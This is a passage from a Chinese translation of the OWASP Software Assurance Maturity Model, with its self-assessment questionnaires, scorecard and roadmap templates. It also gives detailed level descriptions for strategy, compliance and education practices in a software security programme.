✦大多数业务拥有者是否了解组织的风险概况? ✦大多数开发人员是否对保证项目的未来计划有所意 识? SM1 ✦大多数应用程序和资源是否根据风险被分类? ✦风险评级是否被用于调整需求的保证措施? ✦组织是否知道基于风险评级需要什么? SM2 ✦是否采集了每个项目保证措施成本的数据? ✦你的组织是否经常和其他组织比较安全成本? SM3 政策与遵守 是/不是 ✦是否大多数的项目拥有者知道他们项目的政策和标准 的遵守状态? ✦遵守需求是否被项目团队特别考虑到? PC1 ✦组织是否使用了一套政策和标准来控制软件开发? ✦项目团队是否可以对政策和标准的遵守要求审计? PC2 ✦项目是否定期审计以确保政策和标准的遵守底线? ✦组织是否系统性得使用审计以采集并控制遵守的证 据? PC3 教育与指导 是/不是 ✦大多数的开发人员是否接受了高级别的安全意识培 训? ✦每个项目团队是否都接触了安全开发的最佳实例和指 导? EG1 ✦开发过程中的大多数角色是否受到了根据角色的培训 和指导? ✦大多数的利益相关者是否能够在项目中安排安全指导 员? EG2 ✦与安全相关的指导是否由组织集中控制并在组织中一 致分部? ✦大多数的人员是否为安全开发进行了测试以保证达到 要求的最低技能底线? EG3 23 构造 评估表 威胁评估 是/不是 ✦组织中的大多数项目是否考虑并记录可能的威胁? ✦组织是否了解并记录可能面对的攻击者类型? TA1 ✦项目团队是否定期为可能的滥用分析功能需求? ✦项目团队是否为相关比较使用了一个威胁等级评定方 法? ✦利益相关者是否意识到相关的威胁和等级评定? TA2 ✦项目团队是否具体考虑了来自外部软件的风险? ✦所有的保护机制和控制是否能捕获并匹配威胁? TA3 安全需求 是/不是 ✦大多数项目团队在开发过程中是否明确阐述的一些安 全需求? ✦项目团队是否从最佳实例和遵守的指导中引导需求? SR1 ✦大多数的业务拥有者是否审核相关项目的访问控制矩 阵? ✦项目团队是否根据来自于其他安全活动的反馈来详细 阐述需求? SR2 ✦大多数的业务拥有者是否为安全需求审核厂商的协 议? ✦项目团队描述的安全需求是否被审计? SR3 安全架构 是/不是 ✦项目团队是否提供一个推荐的第三方部件列表? ✦大多数的项目团队是否意识到安全设计原则并应用它 们? SA1 ✦您是否为项目团队宣传可共享的安全服务? ✦项目团队是否提供了基于应用程序架构的规范设计模 式? SA2 ✦项目团队是否从中央控制平台和框架建立软件? ✦项目团队是否为安全架构部分的使用进行审计? SA3 24 确认 评估表 设计审核 是/不是 ✦项目团队是否记录软件设计的攻击范围? ✦项目团队是否按照已知的安全风险检查软件设计? DR1 ✦大多数项目团队是否为安全机制具体分析设计元素? ✦大多数项目业务拥有者是否知道如何获得一个正式的 设计审核? DR2 ✦设计审核过程中是否包括详细的数据级分析? ✦常规项目审计是否需要一个设计审核结果的最低线? DR3 代码审核 是/不是 ✦大多数的项目团队是否拥有基于普遍问题的审核清单 列表? ✦项目团队是否通常针对选择的高风险代码执行审核? CR1 ✦大多数项目团队是否可以使用自动的代码分析工具去 查找安全问题? ✦大多数项目业务拥有者是否持续要求并审核来自代码 审核的结果? CR2 ✦项目团队是否根据应用程序特定的编码标准,使用自 动化的方式去检查代码? ✦常规项目审核是否需要一个为发布代码审核结果的最 低线? CR3 安全测试 是/不是 ✦项目是否明确指定一些基于需求的安全测试? ✦大多数项目是否在发布以前执行渗透测试? ✦大多数利益相关者是否意识到需在发布以前进行安全 测试? ST1 ✦项目是否使用了自动化工具去评估安全测试用例? ✦大多数项目是否遵守一个一致的过程,为利益相关者 评估并记录安全测试? ST2 ✦安全测试用例是否为应用程序特定的逻辑而综合制作 的? ✦常规项目审核是否需要来自于安全测试的最低标准结 果? ST3 25 部署 评估表 漏洞管理 是/不是 ✦大多数项目是否都有对于安全问题的联络点? ✦组织是否已设立一个安全响应团队? ✦大多数项目团队是否知道他们的安全联络点和响应团 队? VM1 ✦组织对于事件的报告和处理是否使用了一种一致的流 程? ✦大多数利益相关者是否意识到公开的相关安全事件与 他们的软件项目有关系? VM2 ✦大多数调查了根本起因的安全事件是否有了更多更深 入的建议? ✦大多数项目是否持续收集并报告关于安全事件的数据 和衡量标准? VM3 环境强化 是/不是 ✦大多数项目是否为操作环境记录需求? ✦大多数项目是否检查第三方软件部件的安全更新? EH1 ✦是否使用一个持续连贯的处理流程以对于关键依赖的 部件使用安全更新和补丁? ✦大多数项目是否权衡了应用程序的自动化检测和环境 的健康状态? EH2 ✦利益相关方是否意识到当进行操作时用于保护软件的 额外工具的选择? ✦常规审计是否为大多数的项目检查环境健康状况? EH3 操作实现 是/不是 ✦你是否递交了关于多数软件发布的安全记录? ✦大多数项目是否都记录了与安全相关的警报和产生错 误的条件? OE1 ✦大多数项目是否正在使用一个已理解的变更管理处理 流程? ✦项目团队是否为每个软件发布递交了一份操作安全手 册? OE2 ✦大多数项目是否为了恰当的操作安全信息,而去审计 检查每个发布? ✦软件组件的代码签名是否按照一致的处理流程被经常 进行? OE3 26 创建记分卡 根据为给每个安全实践填写的分 数,一个组织可以创建一个记分卡来 记录这些分数值。从功能而言,记分 卡可以是某个特定的时间记录的12组 分数。但是,通过每过一个时间间隔 产生了一个记分卡,有利于了解在时 间框架内,保证计划的总体变化。 在以下几种情况中,建议使用时 间间隔形式的记分卡: ✦差距分析——将获得的详细评估结 果与预期的性能等级做比较,获得分 数。 ✦改善证明——在一次安全计划迭代 建立完成的前后,获得分数。 ✦持续衡量——为一个已经就位的保 证计划,在持续的时间框架内获得分 数。 右侧的图是一个记分卡样本,展 现了一个组织的保证计划在一年中是 如何改变的。如果该组织还保存了他 们预期将在一年结束后获得的数据, 那将是另一组有趣的数据,因为这将 有助于显示在一年中计划改变的程 度。 27 建立保证计划 SAMM 的主要用法之一是帮助组 织建立软件安全保证计划。这个过程 很直接,通常,如果组织已经执行了 一些安全保证措施,那么由评估开始。 我们为普遍类型的组织提供了几 种路线图模板。因此,许多组织可以 选择一个相匹配的合适模版,然后适 当调整路线图模板以满足他们的需 求。对于其他类型的组织,则可能需 要建立一个自定义的路线图。 路线图(右图)由不同的阶段(垂 直线条)组成,其中实践随着等级的 提高而改善。因此,建立一个路线图, 允许选择哪些实践在每个计划的阶段 得到改善。组织可以根据他们的意愿 自由地定制将来的计划,但是,鼓励 根据业务驱动和组织特定的信息来循 序执行,以确保保证计划的目标与组 织的业务目标和风险承受能力相适 应。 路线图建立以后,执行保证计划 则很简单。一个组织从改善阶段开始, 通过执行定制的措施来达到预期的等 级。在该阶段结束时,应根据完成的 实际情况调整路线图,然后开始下一 阶段。 执行初步 评估 是否已有路 线图模版 建立一 个空模 版 选择合 适的路 线图 选择实践以 求改善 在路线图 标记选择 的改善 完成 为组织调 整路线图 没有 有 开始 添加其他阶 段 不 是 28 独立软件供应商 路线图模版 关系 独立软件供应商的核心业务包括了构 建及销售软件组件和应用程序。 由于最初目的是限制会影响客户和用 户业务的常见漏洞,因而早期行动专注于 “代码审核”和“安全测试”的措施。 为了在产品说明中转向为积极主动地 避免安全错误,组织会逐渐加强针对“安全 需求”的措施。 此外,为了尽量降低已发现安全问题所 造成的影响,组织还会逐渐加强“漏洞管理” 措施。 随着组织逐渐成熟,来自“操作实现” 的措施被逐渐增加,以更好地为客户和用户 提供软件安全操作的信息。 额外的考虑 外包式开发 对于采用外部开发资源的组织,由于无 法直接接触代码,因此,“安全需求”对于 “代码审核”有着更为重要的优先级。此外, 在早期阶段的高级“威胁评估”,可以允许 组织能够更好的向外包开发人员提出更明 确的安全要求。由于有关软件配置的专业技 术通常是外包团队中最有优势的,因此必须 制定合同以说明与“操作实现”相关的措施。 连接Internet的应用程序 建立使用在线资源的应用程序的组织, 存在一些额外的风险。这些风险源自于运行 位于互联网基础设施构架中,面向互联网的 系统。考虑到这方面的风险,组织应该将“环 境强化”措施添加到他们的路线图中。 驱动程序与嵌入式开发 对于为嵌入式系统创建低层的驱动程 序或软件的组织而言,在软件设计中的安全 漏洞更有具破坏性,并且修复成本更高。因 此,路线图必须被修改,以强调在早期阶段 执行的“安全架构”和“设计审核”的措施。 通过收购而发展壮大的组织 在通过收购而发展壮大的组织中,通常 存在遵循不同开发模式的若干个项目团队, 而其与安全相关措施的等级也不同。对于这 类组织,如果正在开发很多不同类型的软 件,那么需要为各个部门或项目团队分别制 定相应的路线图,以解决各个项目的起点和 特定于项目关注点不同这一问题。 29 在线服务提供商 路线图模版 关系 在线服务提供商的核心业务包括创建 网页应用程序和其他网络可访问的界面。 由于最初目的是在不妨碍创新的前提 下验证设计的整体稳固性,因而早期措施专 注于“设计审核”和“安全测试”。 由于关键的系统将面向网络,还应尽早 执行“环境强化”措施,并逐渐解决托管环 境中存在的风险。 尽管组织的核心业务有所不同,但“政 策与遵守”措施应当尽早启动,然后根据外 部遵守驱动因素的关键性进行推进。 随着组织的逐渐成熟,“威胁评估”“安 全需求”和“安全架构”措施逐渐添加,以 便在基准安全预期建立以后支持主动的安 全防御。 额外的考虑 外包式开发 对于采用外部开发资源的组织,由于无 法直接接触代码,因此“安全需求”措施对 于“代码审核”有着更为重要的优先级。此 外,在早期阶段的高级“威胁评估”,可以 允许组织能够更好的向外包开发人员提出 更明确的安全要求。由于有关软件配置的专 业技术通常是外包组中最有优势的,因此必 须制定合同以说明与“操作实现”相关的措 施。 在线支付处理 被要求遵守支付卡行业数据安全标准 (PCI-DSS)或者其他在线支付标准的组 织,应当在路线图的早期放入“政策与遵守” 措施。这使得组织能够借机制定相关措施, 以保证在将来的路线图中得到遵守和实现。 网页服务平台 对于正在构建网页服务平台的组织,设 计方面的错误将会带来额外的风险,并且修 复的成本更高。因此,应该将“威胁评估” “安全需求”和“安全架构”等措施排放在 路线图的早期阶段。 通过收购而发展壮大的组织 在通过收购而发展壮大的组织中,通常 存在遵循不同开发模式的若干个项目团队, 而其与安全相关措施的等级也不同。对于这 类组织,如果正在开发很多不同类型的软 件,那么需要为各个部门或项目团队分别制 定相应的路线图,以解决各个项目的起点和 特定于项目关注点不同这一问题。 30 金融服务机构 路线图模版 关系 金融服务机构的核心业务包括建立系 统以支持金融交易和处理。通常情况下,这 意味着一个非常集中的内部后端系统与外 部不同的数据提供方相链接。 在初始阶段,工作的重点是改善那些与 “监管”相关的实践,因为这些都是为保证 计划设置基准和帮助组织到达遵守标准的 关键服务。 因为主动建立安全且可靠的软件是一 个总目标,在“构造”中的实践应尽早实施 并能快速促使计划得成熟。 验证措施也同样能促使路线图计划的 稳定执行,以处理现有系统不会创建不切实 际的目标预期。此外,这还有助于确保使用 了足够的循环来建立更为积极的实践。 由于金融服务机构往往操作自己开发 的软件,那么重点则是在路线图的中期,当 一些初始的“监管”实践完成以后,且在花 更多精力在“构架”的实践以前,关注于“部 署”中的实践。 额外的考虑 外包式开发 对于采用外部开发资源的组织,由于无 法直接接触代码,因此“安全需求”对于“代 码审核”有着更为重要的优先级。此外,在 早期阶段的高级“威胁评估”,可以允许组 织能够更好的向外包开发人员提出更明确 的安全要求。由于有关软件配置的专业技术 通常是外包组中最有优势的,因此必须制定 合同以说明与“操作实现”相关的措施。 网页服务平台 对于正在构建网页服务平台的组织,设 计方面的错误将会带来额外的风险,并且修 复的成本更高。因此,应该将“威胁评估” “安全需求”和“安全架构”等措施排放在 路线图的早期阶段。 通过收购而发展壮大的组织 在通过收购而发展壮大的组织中,通常 存在遵循不同开发模式的若干个项目团队, 而其与安全相关措施的等级也不同。对于这 类组织,如果正在开发很多不同类型的软 件,那么需要为各个部门或项目团队分别制 定相应的路线图,以解决各个项目的起点和 特定于项目关注点不同这一问题。 31 政府组织 路线图模版 关系 政府组织的核心业务功能涉及到国家 的附属机构,建立软件以支持公共部门的项 目。 在初始阶段,“监管”实践被建立,并 得到一个为组织改善具体路线图的遵守压 力的大概想法。 由于公众曝光的风险以及大量已有代 码的部署,在“验证”实践的早期强调“安 全测试”,并在后期大量发展“代码审核” 或者“设计审核”实践。 类似的重点同样放在“构造”和“部署” 实践中。这有助于建立组织的漏洞管理,并 有助于推动操作环境的安全姿态。与此同 时,“构造”中的主动安全措施被建立,以 帮助在软件开发过程中防止发生新的问题。 额外的考虑 外包式开发 对于采用外部开发资源的组织,由于无 法直接接触代码,因此“安全需求”对于“代 码审核”有着更为重要的优先级。此外,在 早期阶段的高级“威胁评估”,可以允许组 织能够更好的向外包开发人员提出更明确 的安全要求。由于有关软件配置的专业技术 通常是外包组中最有优势的,因此必须制定 合同以说明与“操作实现”相关的措施。 网页服务平台 对于正在构建网页服务平台的组织,设 计方面的错误将会带来额外的风险,并且修 复的成本更高。因此,应该将“威胁评估” “安全需求”和“安全架构”等措施排放在 路线图的早期阶段。 规章制度遵守 对于拥有大量需受规章制度限制业务 的组织,建立“政策与遵守”的实践应加以 调整,以适应外部驱动因素。同样,对于仅 有少数遵守压力的组织,应抓住机会建立实 践,以满足不同的需要。 32 安全实践 详细说明 33 本节描述了 SAMM 中的细节:每个安全实践中的成熟度等级。对于每一个 实践,汇总表包含了相关的三个等级。随后,每个等级的描述,包括详细地解释 了所需的措施、组织从预期达到的等级获得的结果、衡量性能的成功指标、所需 的持续人员投资以及其他相关的开销。 34 策略与指标 SM1 SM2 SM3 目标 为组织内的软件 安全建立统一的 战略路线图。 衡量数据和软件 资产的相对价值, 并选择风险容忍 度。 使安全成本与相 关业务指标和资 产价值相一致。 措施 A. 评估整体业务 风险概况; B. 建立并维护保 证计划路线 图。 A. 根据业务风险 将数据和应用 程序分类; B. 建立并衡量每 个分组的安全 目的。 A. 引导周期性地 全行业成本比 较; B. 为以前的安全 成本收集度量 标准。 评估 ✦是否已经有了 一个软件安全保 证计划? ✦大多数业务拥 有者是否了解组 织的风险概况? ✦大多数开发人 员是否对保证项 目的未来计划有 所意识? ✦大多数应用程 序和资源是否根 据风险被分类? ✦风险评级是否 被用于调整需求 的保证措施? ✦组织是否知道 基于风险评级需 要什么? ✦是否采集了每 个项目保证措施 成本的数据? ✦你的组织是否 经常和其他组织 比较安全成本? 结果 ✦具体列举出了 由软件导致的最 关键的业务级风 险; ✦定制了能够满 足组织安全需求 并有最小开销的 路线图计划; ✦整个组织都了 解了保证计划将 会如何逐步进展。 ✦根据业务的核 心价值,为每个项 目定制保证计划; ✦整个组织都了 解到了与安全相 关的数据和应用 程序资产; ✦使利益相关者 更好地了解并认 同风险。 ✦有助于制定每 个案例安全支出 决策的信息; ✦估算由于安全 问题而在过去造 成的损失; ✦考虑每个项目 的安全支出与潜 在的损失; ✦整个行业对于 安全的勤奋付出。 35 策略与指标 SM1 为组织内的软件安全建立统一的战略路线图 措施 A. 评估整体业务风险概况 与业务拥有者和利益相关者进行面谈,并建立一 个包括了组织各种应用程序和数据资产的最坏案例 情况列表。根据组织开发、使用或销售软件的方式, 最坏案例情况列表会有很大的不同。但常见的问题包 括:数据盗窃或崩溃、服务中断、资金损失、逆向工 程、帐户被盗等。 当获得了尽量多的最坏案例情况后,根据所收集 到与核心业务相关的信息和知识,核对并选择最重要 的情况。虽然可以选择任何数量的情况,但选择目标 的范围应在3到7个,以便能更有效地利用时间,并保 持工作的重点。 向组织详细阐释所选择的每一个选项,并记录有 关最坏案例的情况、潜在导致发生的因素以及潜在牵 制要素的详情。 最终的组织风险概况应由组织拥有者和其他利 益相关者进行审核,以确保他们了解了这些内容。 B. 建立并维护保证计划路线图 为了了解组织的主要业务风险,针对十二项“实 践”中的每一项,评估组织目前的状况。如果组织通 过了所有累加的成功指标,那么可以根据相应的目标 为每项“实践”以1、2、3这样的分数进行打分。如 果没有达到成功指标,则为该实践打0分。 一旦完全了解了目前的状态后,下一个目标就是 确定下一循环中需要改善的“实践”了。根据业务风 险概况、其他业务驱动因素、遵守需求、预算容限等 方面选择实践。一旦实践选择以后,重复操作的目标 就是达到每个实践的“目的”。 在保证计划的改善方面,需要3到6个月的迭代操 作,但应当至少每3个月召开一次保证策略会议,以 审核计划的措施、参照成功指标的状况、以及可能要 求更改计划改变的其他业务驱动因素。 结果 ✦具体列举出了由软件 导致的最关键的业务级 风险; ✦定制了能够满足组织 安全需求并有最小开销 的路线图计划; ✦整个组织都了解了保 证计划将会如何逐步进 展。 成功指标 ✦>80%的利益相关者在 过去6个月内都大概了解 了业务风险概况; ✦>80%的员工在过去3 个月内大概了解了保证 计划路线图; ✦>1次以上的保证计划 战略会议在过去3个月内 被召开。 成本 ✦扩充并维护组织风险 概况; ✦每季度评估一次保证 计划。 人员 ✦开发人员(1天/年) ✦架构师(4天/年) ✦经理(4天/年) ✦业务拥有者(4天/年) ✦QA保证测试员(1天/ 年) ✦安全审计人员(4天/ 年) 相关等级 ✦策略与指标-1 ✦威胁评估-1 ✦安全需求-2 36 策略与指标 SM2 衡量数据和软件资产的相对价值,并选择风险容忍度 措施 A. 根据业务风险将数据和应用程序分类 为应用程序建立一个简单的分类系统来表示风险 等级。最简单的形式可以分为高/中/低等级。也可以使 用更为复杂的分类方法,但所分的等级不应超过七个, 并且它们应当从高到低表示对业务风险的影响。 从组织的业务风险概况开始,制定能将每个项目匹 配到一个具体风险等级的项目评估准则。一个相似但是 独立的分类模式也应当为数据资产建立。另外,应当根 据对业务风险的潜在影响为每一项数据资产进行权衡 和分类。 对收集的每个应用程序的信息进行评估,并根据总 评估准则和目前使用数据资产的风险分类,为每个应用 程序分配一个风险类别。这项工作可由安全团队集中进 行;或由单独的项目团队,通过定制的问卷调查来收集 必要的信息。 应当制定一个针对应用程序和数据资产风险分类 的处理流程,以便为新资产分配风险类别,并至少每半 年更新一次现有信息。 B. 建立并衡量每个分组的安全目的 为组织的应用程序文档实施了分类计划后,组织可 以为直接的安全目标和保证计划路线图做出更细致地 选择。 通过指定每个类别特定实践的重点,保证计划的路 线图应为每个应用程序风险分类进行修改。对于每次执 行保证计划时,通常会按照优先级将最高级别的目标设 置在最高的风险应用程序等级上,并依次将不太紧要的 目标排在较低或其他等级。 这一过程可建立组织的风险容限,因为必须要为每 个风险类别中的应用程序期待哪些具体的目标做出主 动决策。通过选择将较低风险的应用程序保持在较低的 安全功能性能级别,资源会被保存,以换取接受权重的 风险。但是,没有必要为每个风险类别构建单独的路线 图,因为这样会使保证计划本身的管理效率低下。 结果 ✦根据业务的核心价 值,为每个项目定制保 证计划; ✦整个组织都了解到了 与安全相关的数据和应 用程序资产; ✦使利益相关者更好地 了解并认同风险。 额外成功指标 ✦>90%的应用程序和 数据资产在过去12个月 内针对风险分类进行了 评估; ✦>80%的员工在过去6 个月内对相关应用程序 和数据的风险评级有大 致了解; ✦>80%的员工在过去3 个月内对相关的保证计 划路线图有大致了解。 额外成本 ✦应用程序的建立或者 许可证的支付以及数据 风险分类计划; ✦计划更为精细的路线 图计划开销。 额外人员 ✦架构师(2天/年) ✦经理(2天/年) ✦业务拥有者(2天/年) ✦安全审计人员(2天/ 年) 相关等级 ✦政策与遵守-2 ✦威胁评估-2 ✦设计审核-2 37 策略与指标 SM3 使安全成本与相关业务指标和资产价值相一致 措施 A. 引导周期性地全行业成本比较 以行业交流论坛、业务分析师和咨询公司或其他外部资 源为来源,收集并研究关于安全成本的信息。特别是,需要 确定一些关键因素。 首先,使用收集到的信息,以确定行业中同类组织在安 全方面投入的平均成本。这可以通过自上往下的方式,通过 对占预算的总百分比、收入等的估算来完成;或者使用自下 往上的方式,通过确定被认为是组织正常的相关安全活动来 完成。从整体上说,某些行业的情况很难估计,因此,需要 从可访问的相关信息源尽可能多得收集信息。 研究安全成本的另一个目标,是确定您的组织是否可以 从正在使用的第三方安全产品和服务中节约成本。当考虑决 定更换供应商时,要将隐藏成本(如重新培训员工的费用或 其他计划开销)考虑在内。 总的说来,这些成本比较工作应当在后续保证计划战略 会议之前执行,并且每年至少进行一次。通过比较获得的信 息应呈送给利益相关者,以更好地使保证计划与业务相一 致。 B. 为以前的安全成本采集衡量标准 为以前的安全事件收集与项目特定相关的成本信息。例 如,为弥补漏洞而耗费的时间和金钱、因系统停机而导致的 经济损失、管理组织的罚款和收费、项目为特定的工具或服 务一次性的安全支出等。 使用应用程序风险分类和为各类别分别规定的保证计 划路线图,每个应用程序的基本安全成本最初可从与相应风 险类别相关的成本估算出。 根据风险类别,将特定于应用程序的成本信息与一般成 本模型相结合,然后评估项目是否有离群值,即,对风险等 级不相称的数据值求和。这些信息表示在风险评估/分类中 有错误;或为提供更有效的安全成本花销,需要调整组织的 保证计划,以解决根本问题。 每个项目对安全支出的跟踪应当在每个季度的保证计 划战略会议上完成,并且相关信息应由利益相关者每年进行 至少一次审核和评估。为保证计划路线图的潜在影响,应讨 论离群值和其他无法预见的成本。 结果 ✦有助于制定每 个案例安全支出 决策的信息; ✦估算由于安全 问题而在过去造 成的损失; ✦考虑每个项目 的安全支出与潜 在的损失; ✦整个行业对于 安全的勤奋付出。 额外成功指标 ✦>80%的项目在 过去3个月内报告 了安全成本; ✦>1次的业界范 围成本比较在过 去1年内执行; ✦>1次的历史安 全成本花销评估 在过去1年内执 行。 额外成本 ✦为安全计划扩 充或许可行业情 报; ✦来自由成本核 算、跟踪和评估而 导致的计划开销。 人员 ✦架构师(1天/ 年) ✦经理(1天/年) ✦业务拥有者(1 天/年) ✦安全审计员(1 天/年) 相关等级 ✦漏洞管理-1 38 政策与遵守 PC1 PC2 PC3 目标 了解组织的相关 监管和遵守要求。 建立安全和遵守 的基准线,并了解 每个项目的风险。 要求遵守标准,并 衡量项目是否符 合全组织的政策 和标准。 措施 A.确定并监控外 部的遵守驱动 因素; B.建立并维护遵 守指导。 A. 为安全和遵守 建立政策和标 准; B. 建立项目审计 实践。 A. 为项目建立遵守 关卡; B. 为审计数据的 采集,采用解 决方案。 评估 ✦是否大多数的 项目拥有者知道 他们项目的政策 和标准的遵守状 态? ✦遵守需求是否 被项目团队特别 考虑到? ✦组织是否使用 了一套政策和标 准来控制软件开 发? ✦项目团队是否 可以对政策和标 准的遵守要求审 计? ✦项目是否定期 审计以确保政策 和标准的遵守底 线? ✦组织是否系统 性得使用审计以 采集并控制遵守 的证据? 结果 ✦对于处理好的 第三方审计结果 而提高了保证; ✦根据遵守需求 的优先顺序,调整 内部资源; ✦及时发现影响 组织的现行法律 法规。 ✦项目团队对安 全和遵守的预期 有了了解; ✦业务拥有者更 好地了解其生产 线中特定的遵守 风险; ✦为将遵守与随 机安全改进更有 效地得到满足而 优化方法。 ✦整个组织都能 了解到因不遵守 政策与标准而导 致的风险; ✦为项目级别的 遵守提供明确保 证; ✦准确地跟踪以 前项目的遵守历 史记录; ✦利用工具的有 效审计流程,以减 少人工工作量。 39 政策与遵守 PC1 了解组织的相关监管和遵守要求 措施 A. 确定并监控外部的遵守驱动因素 当组织有许多遵守要求时,该项措施专门面向那些直接 或间接影响组织构建或使用软件和数据方式的法规和标准。 如果可行的话,利用内部员工专门处理相关遵守事务。 根据组织的核心业务,研究并确定需要遵守或被认定为 是业界规范的第三方监管标准。可能需要遵守的标准包括: 萨班斯-奥克斯利法案(SOX)、支付卡行业数据安全标准 (PCI-DSS)、健康保险流通与责任法案(HIPAA)等。在 阅读并理解每项第三方标准后,收集与软件和数据相关的具 体要求,并建立一个汇总列表,以将每个驱动因素(第三方 标准)与特定的安全要求一一匹配对应。在这一阶段,尝试 通过去除被认为是可选用的标准或仅使用推荐的标准,来限 制数量要求。 组织需要至少每半年进行一次研究,以确保组织紧随第 三方标准的最新更新。根据业界情况和遵守标准的重要性, 这一措施可能对不同组织在工作量和涉及的人员等方面有 所不同,但本措施必须被明确地执行。 B. 建立并维护遵守指导 根据软件的统一列表和来自遵守驱动因素与数据相关 的要求,通过为每个需求创建一个相应的响应声明来详细描 述这个列表。这个列表有时被称为控制声明,每个响应都应 当获得组织的业务活动的概念,以确保达到了要求(或记录 没能符合要求的原因)。 由于典型的审计实践常常涉及到检查一段控制声明是 否充分,然后参照控制声明本身来衡量组织,因而它们必须 要准确地代表实际的组织实践。同样,通过创立简单、轻便 的处理流程元素以涵盖组织能做到的基本遵守,来满足许多 要求,继而使组织能够更好地得到保证。 研究具体的列表,确定主要的差距,以为在建立保证计 划的未来规划工作中提供信息。就有关遵守差距的信息,与 利益相关者进行交流,确保他们意识到不遵守政策与标准会 带来哪些风险。 至少每半年需要与利益相关者更新并审核一次控制声 明。由于标准遵守的驱动因素很多,因而经常进行更新是很 有意义的。 结果 ✦对于处理好的 第三方审计结果 而提高了保证; ✦根据遵守需求 的优先顺序,调整 内部资源; ✦及时发现影响 组织的现行法律 法规。 成功指标 ✦>1次的遵守标 准发现会议在过 去6个月内举行; ✦在过去6个月内 完成并更新了遵 守标准检查列表; ✦>1次的与利益 相关者的遵守标 准审核会议在过 去6个月内进行。 成本 ✦初始创建并维 护遵守标准检查 列表。 人员 ✦架构师(1天/ 年) ✦经理(2天/年) ✦业务拥有者(4 天/年) 相关等级 ✦策略与指标-1 40 政策与遵守 PC2 建立安全和遵守的基准线,并了解每个项目的风险 措施 A. 为安全和遵守建立政策和标准 从当前遵守标准指导开始,审核监管标准并记录任何 可选的或建议的安全需求。同样,组织应当进行一些少量 的研究,以发现其他一些在未来会发生改变的潜在相关遵 守标准要求。 根据已知业务的安全驱动因素,添加一些额外要求来 扩充该列表。通常,只需参考已为开发人员提供的现有指 南并搜集一系列最佳实践。 将普通的和相似的要求进行分类,并将每个组分类重 新编写为更普遍的和更简单的声明,以满足所有的遵守驱 动因素并提供一些额外的安全价值。通过每一次以建立一 组内部政策和标准为目标的分组处理,可直接匹配回遵守 标准的驱动因素和最佳实践。 值得一提的是,政策和标准不能包含对于项目团队难 以遵循或遵循成本太高的要求。大约80%的项目应能够在 中断最少的情况下遵守标准。这需要制定一个良好的交流 计划,以宣传新的内部政策与标准,并在需要时帮助项目 团队遵守标准。 B. 建立项目审计实践 为项目团队创建一个简单的审计流程,以要求并接受 对内部标准的审计。审计通常由安全审计员执行,但是, 如果有熟知安全知识的员工熟悉内部标准,也可由他们执 行这一任务。 根据所有已知的业务风险指标,按优先级顺序将项目 放入审计队列,这样,高风险软件的评估将能更早地执行 或被更频繁地执行。此外,低风险项目可以放宽内部审计 的要求,以使审计实践更加有效。 总的来说,每个进行的项目都应至少每半年进行一次 审计。一般情况下,如果对应用程序保留了足够的审计信 息,在初次审计完成以后执行的审计就会更简单。 向业务拥有者和其他利益相关者介绍这种服务,以便 他们能够为他们的项目提出审计申请。根据内部标准,每 个需求的详细通过或未通过的结果都应交给项目利益相关 者进行评估。在可行的情况下,审计结果也应包含对影响 的解释和修改建议。 结果 ✦项目团队对安全 和遵守的预期有了 了解; ✦业务拥有者更好 地了解其生产线中 特定的遵守风险; ✦为将遵守与随机 安全改进更有效地 得到满足而优化方 法。 额外成功指标 ✦>75%的员工在过 去6个月内大概了解 了政策和标准; ✦>80%的利益相关 者意识到了政策和 标准的遵守状态。 额外成本 ✦内部标准的扩充 或许可; ✦每个项目来自遵 守内部标准和审计 的开销。 人员 ✦架构师(1天/年) ✦经理(1天/年) ✦安全审计员(2天/ 项目/年) 相关等级 ✦教育与指导-1&3 ✦策略与指标-2 ✦安全需求-1&3 ✦安全架构-3 ✦代码审核-3 ✦设计审核-3 ✦环境强化-3 41 政策与遵守 PC3 要求遵守标准,并衡量项目是否符合全组织的政策和标准 措施 A. 为项目建立遵守关卡 一旦组织针对安全性制定了内部标准后,要实施的下一 步措施就是在项目生命周期上设置一些特殊点。在项目通过 内部标准审计并被认定遵守了标准以前,特殊点控制项目不 能通过。 通常,遵守标准关卡位于软件发布的点上,这样在通过 遵守标准检查之前,不允许发布该软件。留出足够的审核和 修改时间很重要,因此,通常应较早开始进行审计,例如, 在将发行版本交给QA的时候。 尽管遵守标准关卡是固定的标准,但旧项目或其他特定 的项目可能无法遵守标准,因而必须建立例外批准流程。获 得例外批准的项目不应超过所有项目的20%。 B. 为审计数据的采集,采用解决方案 定期对项目团队进行审计的组织会逐渐积累大量的审 计数据。应使用自动化工具帮助自动收集信息,管理存储和 检索的核对,并限制个人访问敏感的审计数据。 对于内部标准的许多具体要求,现有的工具,比如:代 码分析器、应用程序渗透测试工具、监控软件等,可以经过 定制,用来自动检查内部标准的遵守情况。自动检查遵守情 况的目的在于既能提高审计的效率,又能实现更多的员工在 正式审核前能够自我检查遵守情况。另外,自动检查不容易 发生错误,并保证在发现问题后能尽快得到处理。 信息存储功能应当为每个项目支持对当前和历史审计 数据的集中式访问。自动化解决方案另外还必须提供详细的 访问控制功能,以仅让获得批准的、具有合法业务目的的个 人访问审计数据。 所有关于访问遵守标准的数据以及申请访问权限的说 明信息和处理流程应当向项目团队进行宣传。安全审计员初 次引导项目团队时可能需要较长的时间。 结果 ✦整个组织都能 了解到因不遵守 政策与标准而导 致的风险; ✦为项目级别的 遵守提供明确保 证; ✦准确地跟踪以 前项目的遵守历 史记录; ✦利用工具的有 效审计流程,以减 少人工工作量。 额外成功指标 ✦ >80% 的 项 目 通 过审计,以证明遵 守了政策和标准; ✦每次自动审计 使用的时间不到 人工审计的50%。 额外成本 ✦扩充或许可内 部标准审计自动 化工具; ✦审计关卡和例 外处理流程的持 续维护。 额外人员 ✦开发人员(1天/ 年) ✦架构师(1天/ 年) ✦经理(1天/年) 相关等级 ✦教育与指导-3 ✦代码审核-2 ✦安全测试-2 42 教育与指导 EG1 EG2 EG3 目标 为开发人员提供 关于以安全编程 和部署为主题的 资源。 为软件生命周期 中所有的人员提 供基于角色的安 全开发详细指导。 实施综合的安全 培训,并为员工进 行基本知识的认 证检验。 措施 A. 实施技术安全 意识的培训; B. 建立并维护技 术指导。 A. 实施针对特定 角色的应用程 序安全培训; B. 聘用安全指导 专家增强项目 团队。 A. 建立正式的应 用程序安全支 持门户网站; B. 建立基于角色 的考试或认证 制度。 评估 ✦大多数的开发 人员是否接受了 高级别的安全意 识培训? ✦每个项目团队 是否都接触了安 全开发的最佳实 例和指导? ✦开发过程中的 大多数角色是否 受到了根据角色 的培训和指导? ✦大多数的利益 相关者是否能够 在项目中安排安 全指导员? ✦与安全相关的 指导是否由组织 集中控制并在组 织中一致分部? 